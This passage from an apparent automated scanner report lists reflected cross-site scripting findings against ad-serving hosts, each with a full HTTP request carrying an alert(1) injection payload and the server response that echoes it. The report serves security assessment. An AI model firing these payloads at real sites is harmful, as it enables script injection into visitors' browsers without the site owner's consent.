Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3922


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b668a"><script>alert(1)</script>75e7f948bb9 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3926


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5449"><script>alert(1)</script>4c565f3c010 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55e5449"><script>alert(1)</script>4c565f3c010&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3930


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55e5449"><script>alert(1)</script>4c565f3c010|49160|6468|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK
...[SNIP]...

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the syndicationOutletId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bf0"><script>alert(1)</script>333ca5c3bc5 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:33 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp

Issue detail

The value of the coad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb27a'%3balert(1)//3becd2a0162 was submitted in the coad parameter. This input was echoed as eb27a';alert(1)//3becd2a0162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp?coad=ca,300,250eb27a'%3balert(1)//3becd2a0162 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 14025
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:37:32 GMT
Connection: close

/*
* /xumo/libs/vindicosuite/xumoJS/tags/1.5.6/vindicosuite.xumo.min.js
* (c) 2010 BBE, Inc. All Rights Reserved.
* VERSION 1.5.6.4
*
*/
var VINDICOSUITE={};VINDICOSUITE.XUMO={version:"1.5.6.4",_banners:eval('[{id : "ca", width : "300" , height : "250eb27a';alert(1)//3becd2a0162"}]'),_debug:eval('false'),_min:eval('false'),_inplace:eval('true'),_inject:eval('true'),_trackingDomain:eval('false')?"64.15.238.78":"tracking.vindicosuite.com",jsfile:'/xumo/libs/vindicosuite/xumoJS/
...[SNIP]...

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://creativeby2.unicast.com
Path:   /dynamic.js

Issue detail

The value of the pid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae03c(a)950fcf2715c was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic.js?geo=true&pid=61576ae03c(a)950fcf2715c&vnam=select&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:48 GMT
Connection: keep-alive


var connection_speed_select = "broadband";
var country_select = "us"; var region_select = "texas"; var city_select = "dallas"; var zip_code_select = "75207"; var metro_code_select = "623";
VwP61576ae03c(a)950fcf2715cLoadSelect();

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://creativeby2.unicast.com
Path:   /dynamic.js

Issue detail

The value of the vnam request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69067(a)4f9dac9508e was submitted in the vnam parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic.js?geo=true&pid=61576&vnam=select69067(a)4f9dac9508e&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 332
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:53 GMT
Connection: keep-alive


var connection_speed_select69067(a)4f9dac9508e = "broadband";
var country_select69067(a)4f9dac9508e = "us"; var region_select69067(a)4f9dac9508e = "texas"; var city_select69067(a)4f9dac9508e = "dallas"; var zip_code_select69067(a)4f9dac9508e = "7
...[SNIP]...

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2315b"%3balert(1)//bc620037b7e was submitted in the $ parameter. This input was echoed as 2315b";alert(1)//bc620037b7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=2315b"%3balert(1)//bc620037b7e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:2315b";alert(1)//bc620037b7e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',2315b";alert(1)//bc620037b7e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,2315b";alert(1)//bc620037b7e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cd2c'%3balert(1)//2d011e94584 was submitted in the $ parameter. This input was echoed as 5cd2c';alert(1)//2d011e94584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=5cd2c'%3balert(1)//2d011e94584&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:5cd2c';alert(1)//2d011e94584;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',5cd2c';alert(1)//2d011e94584';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5cd2c';alert(1)//2d011e94584;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

